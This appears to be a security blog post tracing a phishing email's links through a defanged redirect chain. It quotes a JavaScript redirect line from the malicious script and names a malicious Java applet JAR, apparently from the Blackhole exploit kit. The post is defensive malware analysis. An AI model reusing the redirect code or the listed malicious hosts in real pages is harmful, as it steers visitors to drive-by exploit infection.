(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, containing a Java applet. The file path is obfuscated, partially by hex entities. It loads with parameters:
hxxp://216[dot]224[do]182[dot]94/data/Klot.jar?a=1
It passes a "code" param, code="ta.tc". The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind. Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any good malware used in a phishing campaign should, this file receives a not-so-shocking 0/42. I wonder how many users clicked this? Luckily, the individuals who received this did not do so. Instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...
